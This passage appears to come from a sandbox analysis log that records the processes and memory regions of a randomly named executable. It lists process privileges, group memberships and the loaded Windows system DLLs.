"0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3229 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3230 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3231 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3232 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3233 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3234 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3235 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3236 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3237 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3238 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3239 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3240 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3241 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3242 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3243 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3244 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3361 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3362 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3363 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3364 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3365 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3366 start_va = 0x4f0000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3383 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3384 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3554 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3555 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3556 start_va = 0x4f0000 end_va = 0x5adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3557 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 3558 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3559 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3560 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3561 start_va = 0x760000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 3562 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3563 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3564 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3565 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3566 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3567 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3568 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3569 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3570 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3571 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3572 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3573 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3574 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3575 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3743 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3744 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3745 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3746 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3747 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 3748 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3749 start_va = 0x860000 end_va = 0x9e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 3750 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 87 os_tid = 0x1280 Thread: id = 101 os_tid = 0x5b0 Process: id = "13" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd886000" os_pid = "0x13cc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3247 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3248 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3249 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3250 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3251 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3252 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3253 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3254 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3255 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3256 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3257 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3258 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3259 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3260 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3261 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3262 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3421 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3422 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3423 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3424 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3425 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3426 start_va = 0x580000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3427 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3428 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3429 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3430 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3431 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3432 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3433 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3598 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3599 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3600 start_va = 0x750000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 3601 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3602 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3603 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3604 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3605 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3606 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3607 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3608 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3609 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3610 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3611 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3612 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3613 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3614 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3615 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3616 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3617 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3618 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3619 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 3767 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3768 start_va = 0x850000 end_va = 0x9d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 3769 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 88 os_tid = 0xf74 Thread: id = 103 os_tid = 0x12bc Process: id = "14" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd98b000" os_pid = "0x1380" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3269 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3270 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3271 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3272 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3273 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3274 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3275 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3276 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3277 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3278 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3279 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3280 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3281 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3282 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3283 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3284 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3434 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3435 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" 